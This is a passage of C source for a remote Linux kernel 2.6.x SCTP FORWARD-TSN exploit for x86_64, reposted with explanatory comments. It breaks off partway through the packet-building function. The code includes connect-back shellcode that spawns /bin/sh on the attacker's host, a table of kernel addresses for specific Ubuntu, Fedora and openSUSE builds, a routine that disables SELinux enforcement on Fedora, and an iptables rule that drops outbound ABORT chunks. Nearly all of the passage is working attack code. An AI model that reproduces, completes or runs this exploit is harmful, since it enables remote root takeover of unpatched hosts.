Linux Kernel 2.6.x SCTP FORWARD-TSN kernel exploit, x86_64 (2013 repost). Despite the "localroot" label this is a remote exploit: it corrupts the SCTP stream state of a listening target over the network, hijacks the kernel's vsyscall page and receives a root connect-back shell (see usage(): -h rhost / -p rport, -H lhost / -P lport).
  2.  
/*
 * www.is-sec.com/vb/ * JM511
 * Supported targets (the exact -t names are in the kernels[] table below):
 * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
 * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
 * Ubuntu 8.10 x86_64 (2.6.27_7-10 generic/server)
 * Fedora 10 x86_64 (default kernel; the exploit also zeroes an SELinux flag there)
 * openSUSE 11.1 x86_64 (default kernel)
 */
  10.  
  11.  
  12.  
  13. Code from here >
  14.  
#define _GNU_SOURCE

#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/sctp.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
  32.  
/* Byte offsets inside generic_x86_64_shellcode[] that main() overwrites with
 * the connect-back port (2 bytes, network order) and IPv4 address (4 bytes).
 * They point into the sockaddr_in template embedded in the payload
 * ("\x02\x00" family at byte 60, "\x0d\x05" port at 62, "\x7f\x00\x00\x01"
 * address at 64).  The "// 92" / "// 94" values look like offsets left over
 * from an earlier payload layout and are not used. */
#define __OFFSET_PORT_64 62 // 92
#define __OFFSET_HOST_64 64 // 94

//#define __TARGET_SPORT 20000
  37.  
  38.  
/* Kernel-style fixed-width aliases.  The #ifndef only guards against an
 * earlier *macro* definition; if a system header typedefs these names
 * instead (as <linux/types.h> does) the macros are still defined and
 * simply map the names to the equivalent <stdint.h> types. */
#ifndef __u8
#define __u8 uint8_t
#endif

#ifndef __u16
#define __u16 uint16_t
#endif

#ifndef __u32
#define __u32 uint32_t
#endif
  50.  
  51.  
  52.  
/* start crc routines: ripped from wireshark sources */
/* Field sizes of the SCTP common header: source port, destination port,
 * verification tag and checksum, 12 bytes in all.  sctp_crc32c() uses them
 * to know which bytes to feed as zeros (the checksum field itself). */
#define SP_LEN 2
#define DP_LEN 2
#define VTAG_LEN 4
#define CHK_LEN 4
#define HEADER_LEN (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN)
  59.  
  60.  
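/* One CRC-32C step: fold byte d into running crc c (table-driven, reflected). */
#define CRC32C(c,d) (c=(c>>8)^crc_c[(c^(d))&0xFF])

/* Reflected CRC-32C (Castagnoli, polynomial 0x82F63B78) lookup table,
 * indexed by (crc ^ byte) & 0xFF.  Read-only, hence const; unsigned so the
 * entries above 0x7FFFFFFF are not squeezed through a signed conversion. */
static const uint32_t crc_c[256] =
{
0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L,
0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL,
0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL,
0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L,
0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL,
0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L,
0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L,
0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL,
0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL,
0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L,
0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L,
0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL,
0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L,
0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL,
0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL,
0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L,
0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L,
0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L,
0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L,
0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L,
0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L,
0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L,
0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L,
0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L,
0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L,
0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L,
0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L,
0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L,
0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L,
0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L,
0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L,
0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L,
0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL,
0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L,
0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L,
0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL,
0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L,
0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL,
0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL,
0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L,
0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L,
0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL,
0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL,
0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L,
0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL,
0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L,
0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L,
0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL,
0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L,
0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL,
0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL,
0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L,
0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL,
0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L,
0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L,
0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL,
0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL,
0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L,
0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L,
0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL,
0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L,
0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL,
0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL,
0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L,
};

/*
 * Compute the SCTP checksum of a complete packet (common header + chunks).
 *
 * buf: packet starting at the SCTP common header.
 * len: packet length in bytes.  Must be >= HEADER_LEN (12): the first loop
 *      reads 8 header bytes unconditionally and nothing here checks len,
 *      so the caller (make_fwd_packet) is responsible for that.
 *
 * The 4-byte checksum field (bytes 8..11) is fed to the CRC as four zero
 * bytes regardless of its contents, so the packet can be checksummed in
 * place before the field is filled in.
 *
 * Returns the finished CRC with its four bytes reversed.  make_fwd_packet()
 * then stores it with htonl(); keep the two reversals together — on a
 * little-endian host their combined effect is the byte order the original
 * code put on the wire, and "fixing" only one of them breaks the checksum.
 */
static uint32_t sctp_crc32c(const unsigned char *buf, uint32_t len)
{
    uint32_t i;
    uint32_t crc32 = ~0U;
    uint32_t r;

    /* source port, destination port, verification tag */
    for (i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++)
        CRC32C(crc32, buf[i]);

    /* checksum field: always four zero bytes */
    for (i = 0; i < CHK_LEN; i++)
        CRC32C(crc32, 0);

    /* everything after the common header (the chunks) */
    for (i = HEADER_LEN; i < len; i++)
        CRC32C(crc32, buf[i]);

    r = ~crc32;

    /* Byte-reverse r.  The casts keep the shifts in unsigned arithmetic: the
     * original promoted each byte to int, so (b0 << 24) with b0 >= 0x80
     * overflowed a signed int, which is undefined behaviour in C99/C11. */
    return ((uint32_t)(r & 0xff) << 24) |
           ((uint32_t)((r >> 8) & 0xff) << 16) |
           ((uint32_t)((r >> 16) & 0xff) << 8) |
           (uint32_t)((r >> 24) & 0xff);
}
/* end crc routines */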
  159.  
/*
 * x86_64 payload that takes the place of gettimeofday() in the target's
 * vsyscall page: main() writes it at page offset 0x930 and puts a jump to it
 * at offset 0, so every caller of gettimeofday() lands here until
 * patchjump() restores the page.  It therefore has to behave like
 * gettimeofday() for callers it does not want to hijack.  The bytes decode
 * as follows (read with the offsets used by __OFFSET_PORT_64/HOST_64):
 *
 *  prolog: push rbx; getuid (syscall 0x66); if uid != 0 jump to
 *          "pop rbx; gettimeofday (syscall 0x60); ret" — unprivileged callers
 *          get the real system call.  Root callers do fork through the 32-bit
 *          int 0x80 path (eax = 2): the parent takes the same gettimeofday/ret
 *          exit, the child falls through into the connect back.
 *  connect back: socket(AF_INET, SOCK_STREAM, 0); connect() to the embedded
 *          sockaddr_in {family 2, port bytes 0x0d 0x05, 127.0.0.1} — the port
 *          sits at byte 62 and the address at byte 64 and both are patched by
 *          main(); exit_group on failure.  Then dup2(fd, 2), dup2(fd, 1),
 *          dup2(fd, 0) and execve("/bin/sh", ["/bin/sh"], NULL): the string is
 *          stored bitwise-inverted (0xd0 0x9d 0x96 0x91 0xd0 0x8c 0x97 0xff)
 *          and restored with "not rbx"; exit_group if execve returns.
 *
 * Not const: main() patches it in place.  148 bytes (sizeof - 1).
 */
static char generic_x86_64_shellcode[] =
// prolog: uid check, fork as root, real gettimeofday() for everyone else
"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb"
"\x48\x39\xd8\x75\x0f\x48\x31\xc0\xb0\x02\xcd\x80"
"\x48\x31\xdb\x48\x39\xc3\x74\x09\x5b\x48\x31\xc0"
"\xb0\x60\x0f\x05\xc3"
// connect back: socket/connect to the patched sockaddr_in (port @62, host @64)
"\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58"
"\x0f\x05\x48\x97\x50\x48\xb9\x02\x00\x0d\x05\x7f"
"\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a"
"\x58\x0f\x05\x48\x31\xdb\x48\x39\xc3\x74\x07\x48"
"\x31\xc0\xb0\xe7\x0f\x05\x90"
// dup2 loop onto fds 2,1,0 then execve("/bin/sh") and exit_group
"\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75"
"\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48"
"\xf7\xd3\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48"
"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0"
"\xb0\xe7\x0f\x05"
;
  178.  
/* Four zero bytes: on Fedora targets main() writes them over the address in
 * kinfo.selinux ("Disabling Selinux Enforcing Mode"). */
static const char __zero[4] = {0x00, 0x00, 0x00, 0x00};
//static char __force_crash[] = "\x41\x41\x41\x41\x41\x41\x41\x41";

/* xor rax,rax; mov al,0x60; syscall; ret — a plain gettimeofday(2).
 * patchjump() writes these 8 bytes back at offset 0 of the hijacked page
 * as soon as a shell has connected, so later callers stop forking shells. */
static char generic_x86_64_patchjump[] = "\x48\x31\xc0\xb0\x60\x0f\x05\xc3";
/* jmp rel32 (+0x92b); nop — placed at offset 0 of the hijacked page.
 * 0 + 5 (instruction length) + 0x92b = 0x930, exactly where main() puts the
 * shellcode (acc = 0x930 / 2); keep the two in sync. */
static char generic_x86_64_jump[] = "\xe9\x2b\x09\x00\x00\x90";
  184.  
/* Per-kernel 8-byte little-endian kernel virtual addresses (e.g. the first
 * one is 0xffffffff80564000).  Each "vsys_shadow" value is written, via the
 * corrupted neighbouring object, as the base that the second association's
 * FWD-TSN stream writes are redirected to (see main(): "Overwriting
 * neightboard sctp map" followed by the writes at 0x930 and 0).  The name
 * suggests it is the writable kernel-side mapping of the vsyscall page —
 * TODO confirm against each kernel's System.map.  These are per-build
 * constants: a wrong address corrupts some other kernel memory. */

/* ubuntu 7.04 */
static char ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow[] = "\x00\x40\x56\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_20_17_server_x86_64_vsys_shadow[] = "\x00\x90\x5B\x80\xFF\xFF\xFF\xFF";

/* ubuntu 8.04 */
static char ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow[] = "\x00\x50\x62\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow[] = "\x00\x40\x62\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow[] = "\x00\x30\x62\x80\xFF\xFF\xFF\xFF";

static char ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow[] = "\x00\x40\x5d\x80\xFF\xFF\xFF\xFF";

/* ubuntu 8.10 — note the 2.6.27-9..last server and 2.6.27-7..last generic
 * builds use the same address (0xffffffff806f4000). */
static char ubuntu64_2_6_27_7_server_x86_64_vsys_shadow[] = "\x00\x30\x6f\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";

static char ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";

/* fedora code 10 — the second address is where main() writes four zero
 * bytes before the main overwrite; presumably the SELinux enforcing flag. */
static char fedora64_10_default_kernel_x86_64_vsys_shadow[] = "\x00\x10\x57\x81\xFF\xFF\xFF\xFF";
static char fedora64_10_default_kernel_x86_64_selinux[] = "\x84\xE6\x7C\x81\xFF\xFF\xFF\xFF";

/* opensuse 11.1 */
static char opensuse64_11_1_default_kernel_x86_64_vsys_shadow[]="\x00\x10\x8E\x80\xFF\xFF\xFF\xFF";
  208.  
  209.  
/* Output helpers.  __msg_f/__msg print to stdout; __fatal/__fatal_perror
 * print to stderr and terminate the process with exit status 1, so every
 * caller below treats them as non-returning.  (Identifiers starting with a
 * double underscore are reserved for the implementation in C; they are kept
 * here because every call site uses them.) */
#define __msg_f(format, args...) \
do { fprintf(stdout, format, ## args); } while(0)

#define __msg(msg) \
do { fprintf(stdout, "%s", msg); } while(0)

#define __fatal(msg) \
do {fprintf(stderr, "%s", msg); exit(1);} while (0)

#define __fatal_perror(msg) \
do { perror(msg); exit(1); } while (0)
  221.  
/* Which kernel allocator the target uses.  It selects the number of output
 * streams requested per association in make_sctp_connection() (50 on SLAB,
 * 10 on SLUB) so the stream array lands in the object size recorded in
 * kinfo.slubsize, and it makes main() call swap_to_SLAB_chunk(). */
enum {
SLAB_ALLOCATOR=0,
SLUB_ALLOCATOR=1
};
  226.  
/* Everything main() needs to aim the corruption at one specific kernel
 * build.  One entry per supported target in kernels[], selected by name
 * through the -t option. */
typedef struct
{
const char *name;          /* -t value, compared with strcmp() in sctp_getopt() */
const char *info;          /* free-text description shown in the target list */
char *scode;               /* payload written into the hijacked page; main()
                            * patches the connect-back port/host into it IN
                            * PLACE, so it must not be const */
__u32 scodesize;           /* payload length in bytes; must be even, build_stream()
                            * works in 16-bit words and exits otherwise */
__u32 portoff;             /* byte offset of the 2-byte port inside scode */
__u32 hostoff;             /* byte offset of the 4-byte IPv4 address inside scode */
const char *vsysaddr;      /* ptrsize bytes, little-endian kernel address written over
                            * the neighbouring object (see the *_vsys_shadow arrays) */
const char *vsysjump;      /* bytes written at offset 0 of that page to divert
                            * callers into scode */
__u32 vsysjumpsize;

const char *vsyspatchjump; /* bytes written back at offset 0 by patchjump()
                            * once a shell has connected */
__u32 vsyspatchjumpsize;

__u32 chunksize;           /* together with slubsize: (slubsize - chunksize) / 2 is
                            * the 16-bit-word index at which vsysaddr is written,
                            * i.e. where the neighbouring object's pointer sits
                            * relative to the corrupted stream array (per build) */
__u32 slubsize;            /* size of the allocator object the stream array lives in:
                            * 256 on the SLAB targets, 96 on the SLUB targets */
__u32 ptrsize;             /* 8 on x86_64 */

const char *selinux;       /* Fedora only: address of a 4-byte flag zeroed before the
                            * main overwrite (presumably SELinux enforcing); NULL otherwise */

int allocator_type;        /* SLAB_ALLOCATOR or SLUB_ALLOCATOR */

} kinfo;

/* The target selected on the command line; set by sctp_getopt(), NULL until then. */
static kinfo *k;
  253.  
/* Command-line parameters (see usage()). */
typedef struct
{
const char* target;  /* -t: kernels[] entry name */
const char* rhost;   /* -h: target IPv4 address (dotted quad, parsed with inet_addr) */
const char* lhost;   /* -H: local IPv4 address the shell connects back to */
__u16 rport;         /* -p: target SCTP port */
__u16 lport;         /* -P: local TCP port the listener binds */

__u16 sport; // defines associations   /* -s: source port of the association whose stream array is corrupted; sport+1 is the second one */
__u16 nconn;         /* -c: number of extra associations opened first to shape the allocator */

} hinfo;

/* Defaults: everything unset except nconn = 600.  Filled in by sctp_getopt(). */
static hinfo h = { NULL, NULL, NULL, 0, 0, 0, 600 };
  268.  
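/* Fields shared by every target: the same x86_64 connect-back payload, jump
 * stub and restore stub.  Sizes are derived from the arrays so they cannot
 * drift (the jump/patch sizes 6 and 8 used to be hard-coded per entry). */
#define KINFO_GENERIC_X86_64 \
    .scode = generic_x86_64_shellcode, \
    .scodesize = sizeof(generic_x86_64_shellcode) - 1, \
    .portoff = __OFFSET_PORT_64, \
    .hostoff = __OFFSET_HOST_64, \
    .vsysjump = generic_x86_64_jump, \
    .vsysjumpsize = sizeof(generic_x86_64_jump) - 1, \
    .vsyspatchjump = generic_x86_64_patchjump, \
    .vsyspatchjumpsize = sizeof(generic_x86_64_patchjump) - 1, \
    .ptrsize = 8

/* Object layout of the corrupted allocation per allocator family; the
 * neighbour pointer is written at 16-bit word (slubsize - chunksize) / 2. */
#define KINFO_SLAB_256 .chunksize = 40, .slubsize = 256, .allocator_type = SLAB_ALLOCATOR
#define KINFO_SLUB_96  .chunksize = 40, .slubsize = 96,  .allocator_type = SLUB_ALLOCATOR

/*
 * Supported targets, matched by .name against -t.  Members not listed in an
 * entry (notably .selinux) are zero/NULL.  The "faisty" spelling in the
 * Ubuntu 7.04 names is a typo for "feisty" but is the -t value users rely
 * on, so it is kept.
 */
static kinfo kernels[] = {
    {
        .name = "ubuntu64_faisty-2.6.20-[15-17]-generic",
        .info = "(faisty: generic kernel)",
        .vsysaddr = ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLAB_256
    },
    {
        .name = "ubuntu64_faisty-2.6.20-17-server",
        .info = "(faisty: server kernel - last 2.6.20-17 build)",
        .vsysaddr = ubuntu64_2_6_20_17_server_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLAB_256
    },
    {
        .name = "ubuntu64_hardy-2.6.24-[18-21]-generic",
        .info = "(kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)",
        .vsysaddr = ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "ubuntu64_hardy_2.6.24-[16-18]-server",
        .info = "(kernel from 2.6.24-16 to 2.6.24-18 -- server)",
        .vsysaddr = ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "ubuntu64_hardy-2.6.24-[19-22]-server",
        .info = "(kernel from 2.6.24-19 to 2.6.24-22 -- server)",
        .vsysaddr = ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "ubuntu64_hardy-2.6.24-23-last-server",
        .info = "(last 2.6.24-23 kernel before patch -- server)",
        .vsysaddr = ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "ubuntu64_intrepid-2.6.27-7-server",
        .info = "(kernel 2.6.27-7 -- server)",
        .vsysaddr = ubuntu64_2_6_27_7_server_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "ubuntu64_intrepid-2.6.27-[9-last]-server",
        .info = "(kernel 2.6.27-9 to the last unpatched kernel -- server)",
        .vsysaddr = ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "ubuntu64_intrepid-2.6.27-[7-last]-generic",
        /* was a copy of the server entry's text ("2.6.27-9 ... -- server") */
        .info = "(kernel 2.6.27-7 to the last unpatched kernel -- generic)",
        .vsysaddr = ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "fedora64_10-2.6.25-117",
        .info = "(fedora core 10 default installed kernel)",
        .vsysaddr = fedora64_10_default_kernel_x86_64_vsys_shadow,
        .selinux = fedora64_10_default_kernel_x86_64_selinux,
        KINFO_GENERIC_X86_64,
        KINFO_SLUB_96
    },
    {
        .name = "opensuse64_11.1-2.6.27.7-9-default",
        .info = "(opensuse 11.1 default installed kernel)",
        .vsysaddr = opensuse64_11_1_default_kernel_x86_64_vsys_shadow,
        KINFO_GENERIC_X86_64,
        KINFO_SLAB_256
    }
};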
  469.  
  470.  
  471.  
/* modular arithmetic shift
 *
 * A FORWARD-TSN chunk tells the receiver to skip ahead to a given stream
 * sequence number (SSN) on a given stream.  build_stream() abuses that to
 * store an arbitrary 16-bit value: it does not emit the target value
 * directly but first walks the SSN through the three values below, then the
 * target minus one.  Which walk is used depends on whether (target - 1) is
 * in the lower or upper half of the 16-bit range (__SHIFT_CHECK).
 *
 * Why (inferred, TODO confirm against the target kernel's SSN skip logic):
 * the receiver apparently stores the supplied SSN plus one — hence the
 * "- 1" in build_stream() — and only honours a skip that is "ahead" of its
 * current SSN under 16-bit serial-number comparison, so a single write
 * could be ignored depending on the unknown current value; the stepping
 * stones make every move look like a forward one.
 */
#define __SHIFT_CHECK 0x7FFF
static __u16 shift_0_to_7fff[3] = { 0x7FFF, 0xFFFE, 0x0000 };
static __u16 shift_8000_to_ffff[3] = { 0xFFFF, 0x7FFE, 0x8000 };

/* global streams obj
 * Scratch output of build_stream(): up to 1000 {stream id, ssn} pairs, four
 * per 16-bit word of input (three stepping stones + the value), so at most
 * 500 input bytes fit.  Host byte order until htons_streams() is applied. */
static __u16 streams[1000][2];
  479.  
  480. /* get stream flow */
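/*
 * Translate raw bytes into the {stream id, ssn} pairs of a FORWARD-TSN
 * chunk that, once processed by the target, leave those bytes in its
 * stream-SSN array.  Each 16-bit word of data becomes four pairs on the same
 * stream: the three stepping values from shift_0_to_7fff /
 * shift_8000_to_ffff and then (word - 1), because the receiver apparently
 * stores the supplied SSN plus one.  Consecutive words go to consecutive
 * stream ids starting at fc, so fc is in effect the 16-bit-word offset at
 * which data lands.
 *
 * data/size: bytes to write; size must be even.  The pairs are left in the
 * global streams[] in host byte order (run htons_streams() before sending)
 * and their count (always >= 0) is returned.
 *
 * Exits if size is odd or if the pairs would not fit streams[]: the original
 * silently overran the table for inputs longer than 500 bytes.
 */
static int build_stream(const void *data, __u32 size, __u16 fc)
{
    const unsigned char *src = data;
    __u32 nwords, w;
    int stnum = 0;

    if (size % 2)
        __fatal("[!!!] build_stream: data unaligned");

    nwords = size / 2;
    /* four pairs per word must fit the fixed-size streams[] table */
    if (nwords > sizeof(streams) / sizeof(streams[0]) / 4)
        __fatal("[!!!] build_stream: data too large for streams[]");

    memset(streams, 0x00, sizeof(streams));

    for (w = 0; w < nwords; w++, src += 2, fc++)
    {
        __u16 word, val;
        const __u16 *shift;
        int j;

        /* memcpy rather than a __u16 * cast: the inputs are char arrays
         * with no alignment guarantee */
        memcpy(&word, src, sizeof(word));
        val = (__u16)(word - 1);
        shift = (val <= __SHIFT_CHECK) ? shift_0_to_7fff : shift_8000_to_ffff;

        for (j = 0; j < 3; j++)
        {
            streams[stnum][0] = fc;
            streams[stnum][1] = shift[j];
            stnum++;
        }

        streams[stnum][0] = fc;
        streams[stnum][1] = val;
        stnum++;
    }

    return stnum;
}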
  513.  
  514.  
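/* some sctp packet header structs */

/* SCTP common header (12 bytes), immediately followed by the chunks.
 * All fields are in network byte order on the wire. */
struct sctp_hdr
{
__u16 sport;
__u16 dport;
__u32 vtag;      /* peer's verification tag: a forged packet must carry the
                  * tag learnt from the INIT ACK or the target discards it */
__u32 checksum;  /* CRC-32C over the whole packet computed with this field
                  * zero (see sctp_crc32c / make_fwd_packet) */
char chunks[0];
}__attribute__((packed));

/* Generic chunk header: type, flags, length (including these 4 bytes), payload. */
struct sctp_chk
{
__u8 type;
__u8 flags;
__u16 len;
char data[0];
}__attribute__((packed));   /* was __attribute((packed)); GCC accepts both, normalised for consistency */

/* FORWARD TSN chunk header; {stream id, ssn} pairs follow new_tsn. */
struct sctp_chunk_fwd
{
__u8 type;
__u8 flags;
__u16 len;
__u32 new_tsn;
}__attribute__((packed));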
  540.  
  541.  
  542.  
/* Chunk type ids used here: raw_socket_engine() reads the verification tag
 * out of INIT ACK and the cumulative TSN out of SACK chunks; make_fwd_packet()
 * builds FORWARD TSN (0xC0) chunks. */
enum
{
SCTP_INIT_ACK = 2,
SCTP_SACK = 3,
SCTP_FWD = 192
};
  549.  
  550.  
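/*
 * Stop our own kernel from sending SCTP ABORT chunks to the target.
 *
 * The forged FWD-TSN chunks make the target answer with SACKs carrying a
 * TSN our kernel considers out of range; it then aborts the association,
 * which would tear down the very state the exploit is corrupting.  The fix
 * is a local netfilter rule dropping every outbound ABORT.
 *
 * Side effects a user must know about: the rule is appended with a fixed
 * command (no untrusted input reaches system()), needs root/CAP_NET_ADMIN,
 * applies to ALL SCTP associations of this host, and is never removed —
 * delete it by hand afterwards with
 *   iptables -t filter -D OUTPUT -p sctp --chunk-types any ABORT -j DROP
 * A failure is reported but not fatal, as before; without the rule the
 * target association is likely to be torn down and the run to fail.
 */
void disable_abort(void)
{
    int rc = system("iptables -t filter -A OUTPUT -p sctp --chunk-types any ABORT -j DROP");

    if (rc == -1)
        perror("[!!!] system: iptables");
    else if (!WIFEXITED(rc) || WEXITSTATUS(rc) != 0)
        fprintf(stderr, "[!!!] iptables failed (status 0x%x): outbound ABORT chunks are NOT blocked\n", rc);
}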
  561.  
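#define FWD_MAX_SIZE 0x1000
/*
 * Build a raw SCTP packet (common header + one FORWARD TSN chunk).
 *
 * sp/dp:     source/destination ports.
 * vtag:      peer's verification tag, so the target accepts the packet.
 * tsn:       last cumulative TSN seen in the target's SACKs; the chunk
 *            announces tsn + 1 as the new cumulative TSN.
 * streams:   {stream id, ssn} pairs, already in network byte order (see
 *            htons_streams()); streamlen: number of pairs.
 * p_len:     receives the total packet length in bytes.
 *
 * Returns a heap buffer of FWD_MAX_SIZE bytes that the caller must free();
 * the checksum is filled in with sctp_crc32c().  Exits if allocation fails
 * or if the chunk would not fit the buffer / a 16-bit length — the original
 * wrote past the buffer silently in that case.
 */
void *make_fwd_packet(__u16 sp, __u16 dp, __u32 vtag, __u32 tsn,
                      __u16 streams[][2], int streamlen, int *p_len)
{
    /* chunk header (4) + new cumulative TSN (4) + 4 bytes per stream pair */
    size_t chunk_len = sizeof(struct sctp_chunk_fwd) + (size_t)streamlen * 4;
    struct sctp_hdr *hdr;
    struct sctp_chunk_fwd *fwd;
    __u16 *pstream;
    __u8 *buff;
    int i;

    if (streamlen < 0 || chunk_len > 0xFFFF ||
        sizeof(struct sctp_hdr) + chunk_len > FWD_MAX_SIZE)
        __fatal("[!!!] make_fwd_packet: too many stream entries for one chunk\n");

    buff = calloc(1, FWD_MAX_SIZE);
    if (buff == NULL)
        __fatal_perror("calloc: FWD packet");

    hdr = (struct sctp_hdr *)buff;
    hdr->sport = htons(sp);
    hdr->dport = htons(dp);
    hdr->vtag = htonl(vtag);
    hdr->checksum = 0;   /* must be zero while the CRC is computed */

    fwd = (struct sctp_chunk_fwd *)(hdr->chunks);
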